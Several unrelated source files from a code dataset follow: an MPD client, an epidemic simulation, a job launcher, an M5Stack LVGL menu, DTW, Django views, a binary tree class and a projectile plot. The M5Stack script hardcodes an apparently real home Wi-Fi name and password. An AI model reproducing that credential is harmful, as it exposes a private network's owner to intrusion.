self.sema_status = threading.Semaphore()\n self._playlists = []\n self.sema_playlists = threading.Semaphore()\n self._library = []\n self.sema_library = threading.Semaphore()\n\n def cycle_watcher(self):\n self._watcher.connect(self._host, self._port)\n while threading.main_thread().is_alive() and not self.exit_watcher:\n print('Watcher cycle round starts.')\n try:\n for i in self._watcher.idle():\n print(\"Watched message: \"+i)\n self.queue_sender.put_nowait(['watcher_'+i,\n [], {}])\n except:\n print('Watcher round experienced an error. Restart cycle.')\n print('Watcher cycle round ends.')\n try:\n self._watcher.disconnect()\n except:\n print('Watcher wouldn\\'t close, attempting to kill watcher.')\n # self._watcher.kill()\n print('Watcher disconnected.')\n \n def cycle_sender(self):\n while threading.main_thread().is_alive() and not self.exit_sender:\n print('Sender cycle round starts.')\n function, args, kwargs = self.queue_sender.get()\n print(function)\n for i in range(2):\n try:\n print('Command is being send to mpd')\n out = getattr(self._sender, function)(*args, **kwargs)\n # print('Got from sending: ')\n # print(out)\n if function == 'lsinfo': \n self.queue_output.put(out)\n break\n except ConnectionError as e:\n print('Error during sender cycle: {0}'.format(e))\n print('Reconnecting...')\n self._sender.connect(self._host, self._port)\n print('Reconnection sucessful.')\n except BrokenPipeError as e:\n print('Error during sender cycle: {0}'.format(e))\n print('Setting up a new sender...')\n self._sender = MPDClient()\n self._sender.watcher_player = self.player\n self._sender.watcher_options = self.player\n self._sender.watcher_playlist = self.get_playlist\n self._sender.watcher_stored_playlist = self.stored_playlist\n self._sender.watcher_update = self.watcher_update\n self._sender.watcher_database = self.watcher_database\n self._sender.watcher_sticker = self.watcher_sticker\n self._sender.watcher_mixer = self.watcher_mixer\n self._sender.connect(self._host, self._port)\n print('New sender set up.')\n except CommandError as e:\n print('Command Error: {0}'.format(e))\n self.queue_sender.task_done()\n print('Sender cycle round ends.')\n try:\n self._sender.disconnect()\n except:\n print('Sender wouldn\\'t close, attempting to kill sender.')\n # self._sender.kill()\n print('Sender disconnected.')\n\n play = lambda self, number_song=-1: self.queue_sender.put(['play',\n [number_song], {}])\n pause = lambda self: self.queue_sender.put(['pause', [], {}])\n stop = lambda self: self.queue_sender.put(['stop', [], {}])\n next = lambda self: self.queue_sender.put(['next', [], {}])\n previous = lambda self: self.queue_sender.put(['previous', [], {}])\n shuffle = lambda self: self.queue_sender.put(['shuffle', [], {}])\n clear = lambda self: self.queue_sender.put(['clear', [], {}])\n random = lambda self, state: self.queue_sender.put(['random', [state], {}])\n load = lambda self, name_playlist: self.queue_sender.put(['load',\n [name_playlist], {}])\n rm = lambda self, name_playlist: self.queue_sender.put(['rm', [name_playlist], {}])\n add = lambda self, filename: self.queue_sender.put(['add', [filename], {}])\n move = lambda self, songs, destination: self.queue_sender.put(['move',\n [songs, destination], {}])\n update = lambda self: self.queue_sender.put(['update', [], {}])\n save = lambda self, playlistname: self.queue_sender.put(['save', [playlistname], {}])\n\n def delete(self, selected_songs):\n print('Deleting songs')\n print(selected_songs)\n for i in selected_songs:\n self.queue_sender.put(['delete', [i], {}])\n \n # = lambda self: self.queue_sender.put(['', [], {}])\n def toggle(self):\n if self.status['state'] != 'play':\n self.play()\n else:\n self.pause()\n \n def player(self):\n self.status = self._sender.status()\n self.broadcast_status() \n \n def get_playlist(self):\n self.playlist = ['{0} - {1}'.format(i['artist'], i['title']) if 'artist' in i and 'title' in i else\n str(i['file']) for i in self._sender.playlistinfo()]\n print(\"broadcasting playlist\")\n self.broadcast_playlist()\n print(\"Broadcasting status\")\n self.broadcast_status()\n\n def stored_playlist(self):\n self.playlists = [i['playlist'] for i in self._sender.listplaylists()]\n self.broadcast_playlists()\n\n def watcher_update(self): \n full_info = self._sender.listall()\n path_and_title_files = {i.get('directory'):[[],[]] for i in full_info if i.get('directory')}\n path_and_title_files['/'] = [[],[]]\n for i in full_info:\n entry = i.get('directory')\n if entry:\n path, sep, filename = entry.rpartition('/')\n if path:\n path_and_title_files[path][0].append(filename)\n else:\n path_and_title_files['/'][0].append(filename)\n entry = i.get('file')\n if entry:\n path, sep, filename = entry.rpartition('/')\n if path: \n path_and_title_files[path][1].append(filename)\n else:\n path_and_title_files['/'][1].append(filename)\n self.library = path_and_title_files\n # self.broadcast_library()\n \n def watcher_database(self):\n pass\n \n def watcher_sticker(self):\n pass\n \n def watcher_mixer(self):\n pass\n \n def ls(self, folder=''):\n self.queue_sender.put(['lsinfo', [folder], {}])\n files = []\n directories = []\n for i in self.queue_output.get():\n if 'directory' in i:\n directories.append(i['directory'])\n elif 'file' in i:\n files.append(i['file'])\n return [directories, files]\n\n def broadcast_status(self):\n print('Broadcasting status:')\n print(self.status) \n print('Broadcasting ends.')\n \n def broadcast_playlist(self):\n print('Broadcasting playlist:')\n print(self.playlist)\n print('Broadcasting playlist.')\n \n def broadcast_playlists(self):\n print('Broadcasting playlist:')\n print(self.playlists)\n print('Broadcasting playlist.')\n\n def broadcast_library(self):\n print('Broadcasting library:')\n print(self.library)\n print('Broadcasting library.')\n\n def disconnect(self):\n print('Attempting to disconnect.')\n state_random = bool(int(self.status['random']))\n self.exit_watcher = True\n print(\"sending random\")\n self.random(int(not state_random))\n time.sleep(1)\n self.exit_sender = True\n self.random(int(state_random))\n print('Disconnection successful.')\n\n def connect(self):\n print('Reconnecting...')\n self.exit_watcher = False\n self.exit_sender = False\n self._sender.connect(self._host, self._port)\n self.status = self._sender.status()\n self.playlist = ['{0} - {1}'.format(i['artist'], i['title']) if 'artist' in i \n and 'title' in i else str(i['file']) for i in \n self._sender.playlistinfo()]\n self.playlists = [i['playlist'] for i in self._sender.listplaylists()]\n self.watcher_update()\n thread_watcher = threading.Thread(target=self.cycle_watcher)\n thread_watcher.start()\n thread_sender = threading.Thread(target=self.cycle_sender)\n thread_sender.start()\n print('Reconnected.')\n\n @property\n def playlist(self):\n with self.sema_playlist:\n buf = self._playlist\n return buf\n\n @playlist.setter\n def playlist(self, value):\n with self.sema_playlist:\n self._playlist = value\n return\n\n @property\n def status(self):\n with self.sema_status:\n buf = self._status.copy()\n return buf\n\n @status.setter\n def status(self, value):\n with self.sema_status:\n self._status = value\n return\n\n @property\n def playlists(self):\n with self.sema_playlists:\n buf = self._playlists.copy()\n return buf\n\n @playlists.setter\n def playlists(self, value):\n with self.sema_playlists:\n self._playlists = value\n return\n \n @property\n def library(self):\n with self.sema_library:\n buf = self._library.copy()\n return buf\n\n @library.setter\n def library(self, value):\n with self.sema_library:\n self._library = value\n return\n\n\nif __name__ == \"__main__\":\n client = mpd_jan('localhost', 6600)\n client.connect()\n \n print(client.ls('David Guetta'))\n print('Thats it')\n time.sleep(5)\n\n client.disconnect()\n","sub_path":"mpd_jan.py","file_name":"mpd_jan.py","file_ext":"py","file_size_in_byte":10774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"115348651","text":"import pygame\nimport sys\nimport time\nimport random\n\nimport pygame.locals as pgl\n\nimport numpy as np\n\nimport networkx as nx\nimport epydemic\n\nfrom custom_disease_model import Kennels, DistemperModel\nfrom aggregate_visualization import AggregatePlot\n\nfrom copy import copy, deepcopy\n\nfrom threading import Thread\n\nimport logging\n\nimport multiprocessing\nfrom multiprocessing import Pool\n\nimport tqdm\n\nimport pandas as pd\nimport seaborn as sns\n\nimport matplotlib.pyplot as plt\n\nfrom matplotlib import cm\n\nfrom interventions import SortIntervention\n\nclass Simulation(object):\n \n def __init__(self, params, spatial_visualization=True, aggregate_visualization=True, return_on_equillibrium=False):\n self.return_on_equillibrium = return_on_equillibrium\n self.spatial_visualization = spatial_visualization\n self.aggregate_visualization = aggregate_visualization\n\n if not self.spatial_visualization and not self.aggregate_visualization and not self.return_on_equillibrium:\n logging.warning('Warning: No visualizations were set, it is highly recommended you set return_on_equillibrium to True otherwise you will have to manually manage the simulation state.')\n\n self.params = params\n if 'infection_kernel_function' in self.params and type(self.params['infection_kernel_function']) == str:\n self.params['infection_kernel_function'] = eval(self.params['infection_kernel_function'])\n else:\n self.params['infection_kernel_function'] = lambda node, k: 0.0\n if 'intervention' in self.params and type(self.params['intervention']) == str:\n self.params['intervention'] = eval(self.params['intervention'])\n else:\n self.params['intervention'] = None\n self.kennels = Kennels()\n self.disease = DistemperModel(self.kennels.get_graph(), self.params)\n\n self.update_hooks = []\n\n if spatial_visualization:\n self.FPS = 0\n self.SCREEN_WIDTH, self.SCREEN_HEIGHT = 640, 480\n pygame.init()\n self.fpsClock = pygame.time.Clock()\n self.screen = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT), 0, 32)\n self.surface = pygame.Surface(self.screen.get_size())\n self.surface = self.surface.convert()\n self.surface.fill((255,255,255))\n self.clock = pygame.time.Clock()\n\n pygame.key.set_repeat(1, 40)\n \n self.screen.blit(self.surface, (0,0))\n\n self.font = pygame.font.Font(None, 36)\n \n if aggregate_visualization:\n self.plt = AggregatePlot(self.disease, self.kennels)\n self.update_hooks.append(self.plt.update)\n\n def check_events(self):\n for event in pygame.event.get():\n if event.type == pgl.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pgl.KEYDOWN:\n if event.key == pgl.K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n def redraw(self):\n self.screen.blit(self.surface, (0,0))\n pygame.display.flip()\n pygame.display.update()\n self.fpsClock.tick(self.FPS)\n\n def draw_ui(self):\n text = self.font.render('{0} days, {1} hours'.format(int(np.floor(self.disease.t/24.0)), self.disease.t%24), 1, (10, 10, 10))\n textpos = text.get_rect()\n textpos.centerx = 200\n self.surface.blit(text, textpos)\n\n def get_disease_state(self):\n return {sc: len(self.disease.get_state_node(sc)['members']) for sc in self.disease.id_map.keys()}\n \n def update(self):\n if self.spatial_visualization:\n self.check_events()\n self.surface.fill((255,255,255))\n\n if not self.disease.in_equilibrium():\n if 'intervention' in self.params and self.params['intervention'] != None:\n self.params['intervention'].update(simulation=self)\n self.disease.update(self.kennels)\n elif self.return_on_equillibrium:\n self.running = False\n return\n\n for hook in self.update_hooks:\n hook()\n \n if self.spatial_visualization:\n self.kennels.draw(self.surface, self.disease)\n self.draw_ui()\n self.redraw()\n \n def stop(self):\n self.running = False\n\n def run(self, asynchronous=False):\n self.running = True\n if asynchronous:\n self.async_thread = Thread(target=self.run, args=(False,))\n self.async_thread.start()\n else:\n while self.running:\n self.update()\n return self.get_disease_state()\n\nclass BatchSimulation(object):\n def __init__(self, params, runs, pool_size=-1):\n self.params = params\n self.runs = runs\n if pool_size == None:\n self.pool_size = 1\n elif pool_size <= 0:\n self.pool_size = multiprocessing.cpu_count()\n \n def run(self):\n results = []\n with Pool(self.pool_size) as p:\n for i in tqdm.tqdm(p.imap_unordered(BatchSimulation.run_simulation, [deepcopy(self.params) for _ in range(0, self.runs)]), total=self.runs):\n results.append(i)\n p.close()\n p.join()\n return results\n \n @staticmethod\n def run_simulation(params):\n return Simulation(params, spatial_visualization=False, aggregate_visualization=False, return_on_equillibrium=True).run()\n\ndef main(batch=False):\n params = {\n 'pIntake': 0.25,\n 'pInfect': 0.04,\n 'pSurvive': 0.0025,\n 'pDie': 0.0058333333333333,\n 'pDieAlternate': 0.0,\n 'refractoryPeriod': 3.0*24.0,\n 'infection_kernel': [0.5, 0.25],\n 'infection_kernel_function': 'lambda node, k: k*(1-node[\\'occupant\\'][\\'immunity\\'])',\n 'immunity_growth_factors': [1.03, 0.001], # _[0]*immunity+_[1]\n 'intervention': 'SortIntervention()'\n }\n if not batch:\n sim = Simulation(params, spatial_visualization=True, return_on_equillibrium=False, aggregate_visualization=True)\n print(sim.run())\n else:\n runs = 32\n bar_width = 0.35\n proportion = True\n colors = [cm.jet(0), cm.jet(0.5)]\n alphas = [0.5, 0.25]\n labels = ['Sort Intervention', 'No Intervention']\n \n params1 = copy(params)\n params1['intervention'] = None\n \n results = BatchSimulation(params, runs).run()\n\n total = sum(list(results[0].values()))\n df = pd.DataFrame.from_records(results)\n if proportion:\n df /= total\n \n plt.rcdefaults()\n\n objects = df.columns\n y_pos = np.arange(len(objects))\n \n plt.bar(y_pos-bar_width/2, df.mean(), bar_width, align='center', alpha=alphas[0], yerr=df.std()/np.sqrt(len(df)), color=colors[0], label=labels[0])\n \n results = BatchSimulation(params1, runs).run()\n df = pd.DataFrame.from_records(results)\n if proportion:\n df /= total\n plt.bar(y_pos+bar_width/2, df.mean(), bar_width, align='center', alpha=alphas[1], yerr=df.std()/np.sqrt(len(df)), color=colors[1], label=labels[1])\n\n plt.xticks(y_pos, objects)\n plt.ylabel('Mean Animal Count')\n plt.ylim(0, 1)\n plt.title('Average Simulation Performance')\n plt.legend()\n\n plt.show()\n\n\nif __name__ == '__main__':\n main(batch=True)\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"568264939","text":"from multiprocessing import Pool\r\nimport os\r\n\r\ntargetFolder = 'GraphFusionModel'\r\ntargetScript = 'GraphFusionModelV14'\r\n\r\n# targetFolder = 'ARIMA'\r\n# targetScript = 'ARIMA-V1'\r\n\r\n# targetFolder = 'SingleGraph'\r\n# targetScript = 'SingleGraph-V1'\r\n\r\ndef slaveThread(fileNameString, argv):\r\n os.system('python -m ' + fileNameString + ' ' + argv)\r\n\r\nstationRangeList = [\r\n [0, 30]\r\n]\r\n\r\nif __name__ == '__main__':\r\n\r\n n_jobs = 4\r\n stationRange = stationRangeList[0]\r\n\r\n k = stationRange[0]\r\n while k <= stationRange[1]:\r\n currentJobNumber = min(n_jobs, stationRange[1] - k + 1)\r\n print('Total process', currentJobNumber)\r\n p = Pool()\r\n for i in range(currentJobNumber):\r\n p.apply_async(slaveThread, args=(targetFolder + '.' + targetScript + '.py', targetScript + '_%s' % (i + k)), )\r\n p.close()\r\n p.join()\r\n k += currentJobNumber","sub_path":"Chicago/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"593682658","text":"import machine\nimport gc\nimport network\nimport lvgl as lv\n#from m5_lvgl import ButtonsInputEncoder, EncoderInputDriver\n#from lvInputsC import Keyboard, KeyButton, M5ButtonEncoder, deviceDriver\n#from m5inputs.keypad import KeyButton, Keypad\n#from m5inputs.base import deviceDriver\nfrom m5inputs.m5encoder import M5ButtonEncoder, deviceDriver\n\nfrom ili9341 import ili9341\nimport gc\nimport utime\n\nimport micropython\nmicropython.alloc_emergency_exception_buf(100)\n\nfrom micropython import const\nfrom machine import Pin\n\nBUTTON_A_PIN = const(39)\nBUTTON_B_PIN = const(38)\nBUTTON_C_PIN = const(37)\n\n\nAUTHENTICATED = False\n\nOPTION1 = False\nOPTION2 = False\nOPTION3 = False\nOPTION4 = False\n\n\ndef connect():\n \n ssid = \"Maison-ORBI\"\n password = \"08Franie@11Crabole=12Atrel\"\n \n station = network.WLAN(network.STA_IF)\n \n if station.isconnected() == True:\n print(\"Already connected\")\n return\n \n station.active(True)\n station.connect(ssid, password)\n \n while station.isconnected() == False:\n utime.sleep_ms(100)\n print(\".\", end=\"\")\n print(\"\")\n \n print(\"Connection successful\")\n print(station.ifconfig())\n\ndisp = ili9341(miso=19, mosi=23, clk=18, cs=14, dc=27, rst=33, backlight=32,power=-1,power_on=-1, backlight_on=1,\n mhz=40, factor=4, hybrid=True, width=320, height=240,\n colormode=ili9341.COLOR_MODE_BGR, rot=ili9341.MADCTL_ML, invert=False, double_buffer=False\n ) # Create a display driver\n\nconnect()\n\ndef event_handler(obj, event):\n \"\"\"\n Called when a button is released.\n Parameters\n ----------\n btn :\n The Button that triggered the event.\n event :\n The triggering event.\n \"\"\"\n global OPTION1, OPTION2, OPTION3, OPTION4\n if event == lv.EVENT.RELEASED:\n print(\"Clicked: %s\" % lv.list.get_btn_text(obj))\n if lv.list.get_btn_text(obj) == \"Option1\":\n \n OPTION1 = True\n \n elif lv.list.get_btn_text(obj) == \"Option2\":\n \n OPTION2 = True\n\n elif lv.list.get_btn_text(obj) == \"Option3\":\n\n OPTION3 = True\n \n elif lv.list.get_btn_text(obj) == \"Option4\":\n \n OPTION4 = True\n\nscreen = lv.obj()\n\n# Keyboard/pad version\n# kbd = Keypad(debug= True)\n# kbdRead = kbd.getReader()\n# tA = KeyButton(BUTTON_A_PIN, keyboard = kbd, key = lv.KEY.LEFT, debug= True)\n# tB = KeyButton(BUTTON_B_PIN, keyboard = kbd, key = lv.KEY.ENTER, debug= True)\n# tC = KeyButton(BUTTON_C_PIN, keyboard = kbd, key = lv.KEY.RIGHT, debug= True)\n# driv = deviceDriver(kbd, lv.INDEV_TYPE.KEYPAD)\n\n# ButtonEncoder version\nenc = M5ButtonEncoder(debug = True)\n# driv = deviceDriver(enc, lv.INDEV_TYPE.ENCODER)\ndriv = enc.registerDriver()\n\n\nlist1 = lv.list(screen)\nAUTHENTICATED = True\nif AUTHENTICATED:\n list1.set_size(300, 154)\n list1.align(None, lv.ALIGN.CENTER, 0, -5) \n \n # Add buttons to the list\n\n list_btn = list1.add_btn(lv.SYMBOL.FILE, \"Option1\")\n list_btn.set_event_cb(event_handler)\n \n list_btn = list1.add_btn(lv.SYMBOL.DIRECTORY, \"Option2\")\n list_btn.set_event_cb(event_handler)\n \n list_btn = list1.add_btn(lv.SYMBOL.DIRECTORY, \"Option3\")\n list_btn.set_event_cb(event_handler) \nelse:\n list1.set_size(300, 100)\n list1.align(None, lv.ALIGN.CENTER, 0, -5) \n \n # Add buttons to the list\n list_btn = list1.add_btn(lv.SYMBOL.FILE, \"Option2\")\n list_btn.set_event_cb(event_handler)\n \n list_btn = list1.add_btn(lv.SYMBOL.DIRECTORY, \"Option3\")\n list_btn.set_event_cb(event_handler)\n \ngroup = lv.group_create()\nlv.group_add_obj(group, list1)\nenc.group = group\n\nlv.group_set_style_mod_cb(group, None)\nlv.group_set_style_mod_edit_cb(group,None)\nlv.group_set_editing(group, True)\n \nlv.scr_load(screen)\n\n","sub_path":"Examples/taMainD.py","file_name":"taMainD.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47325752","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nclass dtw:\n def __init__(self, x, y):\n try:\n assert len(x.shape) == 1\n except AssertionError:\n assert x.shape[1] == 1\n print('please reset the input shape, make sure it meet the requirement of input')\n self.x = x\n self.y = y\n self.loss, self.loss_mat = self.main()\n\n def distance(self, x, y, is_sum = False):\n sample_distance = lambda x, y: np.abs(x - y)\n \n if is_sum:\n return np.sum(sample_distance(x, y))\n else:\n return sample_distance(x, y)\n\n def main(self):\n self.org_mat = np.zeros((self.x.shape[0], self.y.shape[0]))\n t1,t2 = self.org_mat.copy(),self.org_mat.copy()\n for i in range(self.x.shape[0]):\n for j in range(self.y.shape[0]):\n t1[i,j] = self.x[i]\n \n for j in range(self.y.shape[0]):\n for i in range(self.x.shape[0]):\n t2[i,j] = self.y[j]\n \n self.org_mat = self.distance(t1, t2)\n cost_mat = self.org_mat.copy()\n \n for i in range(self.org_mat.shape[0]):\n for j in range(self.org_mat.shape[1]):\n if i > 0 and j > 0:\n cost_mat[i,j] = cost_mat[i,j] + np.min([cost_mat[i - 1, j], cost_mat[i - 1,j - 1], cost_mat[i, j - 1]])\n elif i == 0 and j > 0:\n cost_mat[i,j] = cost_mat[i,j] + np.min([cost_mat[i, j - 1]])\n #print(np.min([cost_mat[i, j - 1]]))\n elif i > 0 and j == 0:\n cost_mat[i,j] = cost_mat[i,j] + np.min([cost_mat[i - 1, j]])\n \n return cost_mat[i,j], cost_mat\n \nif __name__ == \"__main__\":\n x = np.array([3,2,4,5,6,7,8,9,4,5,6,7,8,9,5,6,6])\n y = np.array([4,5,6,7,8,9,4,5,6,7,8,9,5,6,6])\n test = dtw(x,y)\n print(test.loss)\n print(test.loss_mat)\n print(test.org_mat)","sub_path":"dtw.py","file_name":"dtw.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"240396982","text":"from django.core.exceptions import PermissionDenied\nfrom django.http import Http404\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import ListView\nfrom rtdc.cbv import DecoratorMixin\nfrom rtdc.shortcuts import jsonResp\nfrom tokens.models import CollectorToken\nfrom records.models import Record\n\n\n@csrf_exempt\ndef add_record(request):\n if request.method != \"POST\":\n raise NotImplementedError\n\n token = request.POST.get(\"token\", None)\n data = request.POST.get(\"data\", None)\n\n if not token:\n raise PermissionDenied\n\n if not data:\n raise PermissionDenied\n\n try:\n data = float(data)\n except ValueError:\n raise PermissionDenied\n\n try:\n token = CollectorToken.objects.get(token=token)\n r = Record(\n data=data,\n token=token,\n )\n r.save()\n return jsonResp(r.to_dict())\n except CollectorToken.DoesNotExist:\n raise PermissionDenied\n\nclass RecordsListView(DecoratorMixin, ListView):\n model = Record\n template_name = 'records/list.jinja2'\n\n def get_context_data(self, **kwargs):\n context = super(RecordsListView, self).get_context_data(**kwargs)\n try:\n token = CollectorToken.objects.get(pk=self.kwargs['pk'])\n context['token'] = token\n return context\n except CollectorToken.DoesNotExist:\n raise Http404\n\n def get_queryset(self):\n return self.model.objects.filter(token__pk=self.kwargs['pk'])\n\n\ndef get_series(request, token_id):\n try:\n token = CollectorToken.objects.get(pk=token_id)\n resp = []\n\n serie = {\n 'name': token.name,\n 'data': [],\n 'type': \"area\",\n }\n\n for r in token.records.all().order_by(\"-date_added\"):\n serie['data'].append(\n [\n {\n 'year': r.date_added.year,\n 'month': r.date_added.month,\n 'day': r.date_added.day,\n 'hours': r.date_added.hour,\n 'minutes': r.date_added.minute,\n 'seconds': r.date_added.second,\n 'ms': r.date_added.microsecond,\n },\n r.data\n ]\n )\n\n resp.append(serie)\n return jsonResp(resp)\n\n except CollectorToken.DoesNotExist:\n raise PermissionDenied\n\n\n\n","sub_path":"records/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312630759","text":"import random\n\ndef genbyte():\n temp = \"\"\n for y in range(8):\n i = round(random.random())\n temp = temp + str(i)\n\n while 0 <= int(temp, 2) <= 32:\n temp = genbyte()\n\n while 126 <= int(temp, 2):\n temp = genbyte()\n\n while int(temp, 2) == 94:\n temp = genbyte()\n\n while int(temp, 2) == 96:\n temp = genbyte()\n\n return temp\n\ndef genpwd(bitL):\n pwd = \"\"\n byteL = int(bitL / 8)\n for x in range(byteL):\n pwd = pwd + chr(int(genbyte(), 2))\n return pwd\n","sub_path":"Test Files/PasswordGenerator.py","file_name":"PasswordGenerator.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"452369632","text":"from chapterEight.DanielBaseTree import DanielTree\nfrom abc import abstractmethod\nfrom queue import Queue\nfrom chapterSeven.linkedListQueue import LinkedListQueue\nclass DanielBinary(DanielTree):\n \"\"\"\n ADT for the binary tree specialization, supports three additional accessor methods from the inherited\n DanielTree class\n 1) left(p) -> return the position that represents the left child of position p or None\n 2) right(p) -> return the position tht represents the right child of position p or None\n 3) siblings(p) return the position that represnts the sibling of p or None if it has no children\n \"\"\"\n\n\n @abstractmethod\n def left(self, p):\n \"\"\"\n Time complexity O(1) -> each node class instance will maintain an instance var to its child\n return a position representing P's left child or None\n :param p:\n :return:\n \"\"\"\n @abstractmethod\n def right(self, p):\n \"\"\"\n Time complexity O(1) -> each node class instance will maintain an instance var to its child\n return a position representing P's right child or None\n :param p:\n :return:\n \"\"\"\n\n # -------------------- concrete methods implemented in this class -------------------- #\n\n def sibling(self, p) -> object:\n \"\"\"\n Time complexity O(1) -> each node will maintain a reference to it's parent, which as pointers to its children\n return a a position representing p's sibling or None if there is none\n :param p:\n :return:\n \"\"\"\n\n parent = self.parent(p)\n if parent is None:\n return None\n if p == self.right(parent):\n return self.left(parent)\n else:\n return self.right(parent)\n\n def children(self, p):\n \"\"\"\n Time complexity O(1) -> each node class instance will maintain references it's children, generator yields\n time complexity times # of children, for binary tree this is constant time\n generate an iteration of Positions representing P's children\n :param p:\n :return:\n \"\"\"\n if self.left(p) is not None:\n yield self.left(p)\n if self.right(p) is not None:\n yield self.right(p)\n\n def inorder(self):\n \"\"\"\n returns an iterator of all the elements within a tree using an inorder BFS. binary tree specific as it\n requires there to be only two children per position max\n :return:\n \"\"\"\n if not self.is_empty():\n for y in self._subtree_inorder(self.root()):\n yield y\n\n def _subtree_inorder(self, p):\n \"\"\"\n returns\n :param p:\n :return:\n \"\"\"\n if self.left(p) is not None:\n for other in self._subtree_inorder(self.left(p)):\n yield other\n yield p\n if self.right(p) is not None:\n for other in self._subtree_inorder(self.right(p)):\n yield other\n\n def bredthfirst(self):\n \"\"\"\n O(N) must visit all nodes\n generate a bredth-first iteration of the positions in a tree\n Looks at all elements at depth(p) before proceeding to next layer\n\n :return:\n \"\"\"\n if not self.is_empty():\n # create instance of a linked queue class to hold elements in traversal order\n fringe = LinkedListQueue()\n fringe.enqueue(self.root())\n # add the root\n while not fringe.is_empty():\n # while there are still elements to traverse, get an elmenet\n p = fringe.dequeue()\n # yield element for the iterator\n yield p\n # if the element has children, add those to the back of the queue, to be processed after all\n # elements at current depth(P) are done processing\n for c in self.children(p):\n fringe.enqueue(c)\n\n def positions(self):\n \"\"\"\n Runtime: O(N) must visit all nodes\n overriden from the ADT tree using the in order traversal implementation specific to binary trees\n :return:\n \"\"\"\n return self.inorder()\n\n def parenthesize(self, p):\n \"\"\"\n print a parenthetic representation of a tree\n :param p:\n :return:\n \"\"\"\n print(p.element())\n if not self.is_leaf(p):\n first_time = True\n for c in self.children(p):\n sep = ' (' if first_time else ', '\n print(sep, end=\"\")\n first_time = False\n self.parenthesize(c)\n print(')', end=\"\")\n","sub_path":"chapterEight/BinaryTreeADT.py","file_name":"BinaryTreeADT.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59451705","text":"from numpy import pi\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nV0 = int(input(\"Podaj prędkość początkową: \"))\na = int(input(\"Podaj kąt rzutu (w stopniach): \"))\n\n\ng=9.8\n\nMAX_HEIGHT = (V0*V0*math.sin(a*pi/180)*math.sin(a*pi/180))/(2*g)\n#ZASIEG = (2*V0*V0*math.sin(a*pi/180)*math.cos(a*pi/180))/g\nZASIEG2 = (V0*V0*math.sin(2*a*pi/180))/g\nCZAS_UPADEK = 2*V0*math.sin(2*a*pi/180)\n\nt = np.arange(0, CZAS_UPADEK, 0.2)\nx = np.arange(0, CZAS_UPADEK, 0.2)\nVX = V0*math.cos(a*math.pi/180)*(t-t+1) #VX stałe\nVY = V0*math.sin(a*math.pi/180)-g*t\nz= x*math.tan(a*math.pi/180)\nm= (g*np.square(x))/(2*np.square(VX))\ntor = z-m\nd = V0*math.cos(a*math.pi/180)*t\nf = V0*t-g*np.square(t)/2\nc = np.sqrt(np.square(d)+np.square(f))\n\nprint(\"\\nWysokość maksymalna to: \"+str(MAX_HEIGHT)+\"m\")\n#print(ZASIEG)\nprint(\"Zasięg wynosi: \"+str(ZASIEG2)+\"m\")\nprint(\"Czas lotu wynosi: \"+str(CZAS_UPADEK)+\"s\\n\")\n\n\nplt.subplot(311)\nplt.plot([t], [VX], 'rs')\nplt.plot([t], [VY], 'bo')\nplt.axis([0, CZAS_UPADEK,0,VY[0]])\nplt.xlabel('Czas t(sekundy)')\nplt.ylabel('Prędkość VX/VY (m/s^2)')\n\nplt.subplot(312)\nplt.plot([t],[c], 'rs')\nplt.xlabel('Czas t(sekundy)')\nplt.ylabel('Odległość od [0,0]')\n\nplt.subplot(313)\nplt.plot([x], [tor], 'rs')\nplt.xlabel('odległość x')\nplt.ylabel('wysokość y')\n\nplt.show()","sub_path":"lista9/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"299743258","text":"'''\r\nCreated on 22-Jul-2015\r\n\r\n@author: Selvam\r\n'''\r\n\r\nfrom Tkinter import *\r\n\r\nroot = Tk()\r\nroot.title('CheckButton')\r\n#root.geometry(\"250x150\")\r\n\r\nvar = IntVar()\r\nvar1 = IntVar()\r\nCheckbutton(root, text=\"Button1\", variable=var, selectcolor='skyblue').pack()\r\nCheckbutton(root, text=\"Button2\", variable=var1).pack()\r\nButton(root, text='OK', command=root.destroy).pack()\r\n\r\nlb = Listbox(root, selectmode=EXTENDED)\r\n\r\nfor item in [\"one\", \"two\", \"three\", \"four\"]:\r\n lb.insert(END, item)\r\nlb.pack()\r\n\r\nm1 = Message(root, text=\"Hi\")\r\nm1.pack()\r\n\r\nt1 = Text(root)\r\nt1.insert(END, \"Text\")\r\nt1.config(relief=FLAT, bg='blue', height=1, width=4, state=DISABLED)\r\nt1.pack()\r\n\r\nmainloop()","sub_path":"TkinterCode/checkbutton1.py","file_name":"checkbutton1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"117636815","text":"import unittest\n\nfrom mock import patch\nimport numpy as np\n\nfrom models.LightPulse import LightPulse\nfrom hardware.MeasurementHandler import MeasurementHandler\nfrom models.ExperimentSettings import ExperimentSettings\n\nfrom testfixtures import log_capture\n\n\n@patch(\"hardware.MeasurementHandler.WaveformThread\", autospec=True)\nclass MeasurementHandlerTest(unittest.TestCase):\n # 